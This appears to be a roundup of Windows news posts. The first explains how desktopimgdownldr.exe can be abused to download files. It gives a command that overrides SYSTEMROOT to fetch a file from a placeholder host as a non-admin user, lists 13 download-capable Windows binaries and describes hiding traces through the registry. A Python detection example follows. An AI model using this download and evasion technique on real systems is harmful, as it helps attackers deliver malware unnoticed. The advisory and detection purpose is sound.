Windows 10 background image tool… causes a security issue

A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm.

Known as living-off-the-land binaries (LoLBins), these files come with the operating system and have a legitimate purpose. Attackers of all colors are abusing them in post-exploitation phases to hide malicious activity.

The new LoL in the Bin
An attacker can use LoLBins to download and install malware and to bypass security controls such as UAC or WDAC. Typically, the attack involves fileless malware and reputable cloud services.

A list of 13 Windows native executables that can download and execute malicious code:

powershell.exe
bitsadmin.exe
certutil.exe
psexec.exe
wmic.exe
mshta.exe
mofcomp.exe
cmstp.exe
windbg.exe
cdb.exe
msbuild.exe
csc.exe
regsvr32.exe

The executable, desktopimgdownldr.exe, is part of the Personalization CSP (configuration service provider) that allows, among other things, defining the lock screen and desktop background images.

In both cases, the setting accepts JPG, JPEG, PNG files that are stored locally or remotely (supports HTTP/S URLs).

Running desktopimgdownldr.exe with administrator privileges overrules the user-defined lock screen image, which could alert the user that something suspicious is going on.

This can be avoided, though, if the attacker deletes a registry value immediately after executing the binary, leaving the user none the wiser.

The executable appears to require high privileges (admin) so that it can create files in C:\Windows and in the registry, but it can also run as a standard user to download files from an external source.

This is possible by changing the %systemroot% environment variable to a different location before executing the binary. This changes the download destination and bypasses the access checks.

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Without administrator rights, writing to the registry is not possible, so the lock screen image remains unchanged. In this scenario, the method creates no other artifacts than the downloaded file.

The executable uses the BITS COM object to download the file, and on some machines it tries to locate the COM+ Registration Catalog under %systemroot%. Since the attacker has changed that environment variable, the attempt fails.

Users of Endpoint Detection and Response solutions should add “desktopimgdownldr.exe” to their queries and watchlists and treat it just like “certutil.exe,” a LoLBin widely used both by advanced hackers doing a government’s bidding and by cybercriminals set on scoring big money.
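As an added example (not code from the original post), the watchlist advice above turned into detection logic in Python over constructed Sysmon-style process-creation records: it flags desktopimgdownldr.exe when the lock screen URL is remote, when the caller is not elevated, or when a SYSTEMROOT override is visible on the parent command line. The field names and the sample records are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed Sysmon Event ID 1 style process-creation records, not real telemetry.
# Event 0 mirrors the SYSTEMROOT-override one-liner quoted in the text; event 1 is a
# legitimate, elevated lock-screen change using a local image file.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": "desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext "
                    "/eventName:desktopimgdownldr",
     "ParentCommandLine": r'cmd /c set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe',
     "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:C:\Users\Public\Pictures\lake.jpg "
                    r"/eventName:desktopimgdownldr",
     "ParentCommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs",
     "IntegrityLevel": "System"},
]

URL_RE = re.compile(r"/lockscreenurl:(\S+)", re.IGNORECASE)
# The env override is only visible when it sits on the parent's command line,
# as in the quoted one-liner; Sysmon does not record a process's environment.
SYSROOT_RE = re.compile(r'SYSTEMROOT="?([^"&]+)', re.IGNORECASE)

def analyze_event(ev):
    """Return the reasons a process-creation event is suspicious (empty list = benign)."""
    reasons = []
    if not ev["Image"].lower().endswith("desktopimgdownldr.exe"):
        return reasons
    m = URL_RE.search(ev["CommandLine"])
    if m and urlparse(m.group(1)).scheme.lower() in ("http", "https"):
        reasons.append("remote lockscreen url: " + m.group(1))
        # Without admin rights the image can't be applied, so the only effect is a download.
        if ev["IntegrityLevel"] not in ("High", "System"):
            reasons.append("download as non-admin (" + ev["IntegrityLevel"] + ")")
    s = SYSROOT_RE.search(ev["ParentCommandLine"])
    if s and s.group(1).strip().rstrip("\\").lower() != r"c:\windows":
        reasons.append("SYSTEMROOT override: " + s.group(1).strip())
    return reasons

def hunt(events):
    """Pair each suspicious event's command line with its reasons."""
    return [(ev["CommandLine"], r) for ev in events if (r := analyze_event(ev))]

if __name__ == "__main__":
    for cmdline, reasons in hunt(SAMPLE_EVENTS):
        print(cmdline, "->", "; ".join(reasons))
```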

Windows 10 2004 … It’s again erroneous

It’s been exactly a month since Windows 10 2004 was released. It has cool features, but it’s still a bit erroneous, and users are struggling a little to cope with it.

Windows 10 version 2004, which was released on May 27, is currently available for seekers or those who manually check for updates in Windows Updates settings.

In addition to new features, Windows 10 version 2004 (May 2020 Update) also comes with improvements to block potentially unwanted programs, also known as PUPs or PUAs, from showing up on your system or being installed on Windows PCs.

Windows 10 May 2020 Update allows you to keep track of potentially unwanted programs and prevent them from being downloaded or installed on Windows 10 systems.

Potentially Unwanted Programs come bundled with various types of software, such as driver or registry optimizers.

After applying May 2020 Update, users are reporting that Windows Security app triggers security threat alerts even when the PUA file is gone. After the PUA has been removed or allowed to run on Windows 10, later scans of Windows Security are detecting the old items again, causing an erroneous detection loop.

It appears that Windows Defender has been defaulted to identify PUPs as a threat in Windows 10 version 2004. After the PUP has been removed, Windows Defender identifies the same file as a threat again and again on subsequent scans, based on the stored scan history.

To fix PUP and PUA warnings in Windows Security app, you would need to delete PUPs history information by following these steps:

• Open File Explorer.
• Navigate to C:\ProgramData\Microsoft\Windows Defender\Scans\History\Service
• In the Service folder, delete the PUP-related files.
• Restart Windows and do a quick scan in the Windows Security app.

The notifications for PUPs won’t show up again until another PUP file is loaded on your system.

It’s not yet clear whether Microsoft is aware of the reports, but a fix could be planned as the issue has been widely reported by affected users on Microsoft’s answers forum.

The post Windows 10 version 2004 bug triggers repeated security alerts appeared first on Windows Latest

Windows Server requires TPM: soon to be the new norm

Windows Server to require TPM 2.0 and Secure Boot by default in a future release
Jan 1, 2021 deadline for server-makers to get with the program

Microsoft has announced that the next “major release” of Windows Server will require TPM 2.0 and Secure Boot installed and enabled by default.

“These requirements apply to servers where Windows Server will run, including bare metal, virtual machines (guests) running on Hyper-V or on third party hypervisors approved through the Server Virtualization Validation Program (SVVP),” writes Microsoft’s Windows Server Team.

“Looking ahead, Secure boot and TPM2.0 will serve as the core building blocks for Windows Server security and provide customers with strengthened baseline security for systems available from the ecosystem,” Microsoft’s post adds. “The enforcement of these requirements will be applied to new server platforms introduced to market after January 1, 2021.”

It’s hard to argue against the change, because Secure Boot is a more-than-useful way of ensuring that servers boot into known and trusted environments. TPM 2.0 has been all-but-standard for PCs since 2016. Making it a requirement for the sensitive jobs Windows Server is asked to undertake ought not to be controversial.

There is, of course, some pain in this announcement because it will limit upgrade paths for some users.

But Microsoft appears to know this as its post says: “Existing server platforms will include Additional Qualification certification to help customers identify systems that meet these requirements, similar to the current Assurance AQ for Windows Server 2019 today.”

Windows 10 2004 OS update issues

The Windows 10 May 2020 update was released about a week ago but only to a select group of laptops that aren’t affected by known bugs. Everyone else will encounter a notification informing them that they can’t upgrade their system to Windows 10 version 2004.

This restriction also applies to users whose laptops and desktops use Intel Optane memory, a module that caches your most used programs, videos and docs so you can quickly access them. While laptops with Optane won’t automatically update to the latest Windows version, several users have forced the update through the Media Creation Tool and are now complaining about a compatibility error.

“Unable to load DLL ‘iaStorAfsServiceApi.dll’: The specified module could not be found. (Exception from HRESULT: 0x8),” the message reads.

During the update process, Windows 10 removes an Optane Memory Pinning file from the device, which leads to problems when it tries to run it. As Windows Latest points out, testers uncovered the compatibility issue months ago and reported it in the Feedback Hub.

“This is a problem because Optane Memory Pinnings should have been moved to the new update, but the files were not, but it is still in the Windows Installer Database. I am unable to remove it because the files and uninstallers themselves are gone and now Windows tries to launch a program with .dlls that do not exist,” one person wrote.

It’s possible the complaint sneaked past Microsoft, or the company was so busy trying to fix other widespread issues that it didn’t have time to tackle the Optane problem. Whatever the case, users who own laptops with Optane memory should wait for Microsoft to patch the compatibility bug before downloading the May 2020 Update.

How to Proceed

If you’ve manually forced the update onto your machine and are experiencing problems — related to Optane or otherwise — your best bet is to revert to an earlier version of the operating system.

To do so, search “Update” in Windows Search and choose “Check for Updates.” Select “Update History” toward the bottom of the screen, then “Uninstall updates.” From this page, find Windows 10 version 2004.

You can also try disabling Optane memory from the device manager. Go to the Control Panel and find Programs and Features. From here, right-click Intel Optane Pinning Explorer Extensions and choose “Uninstall.”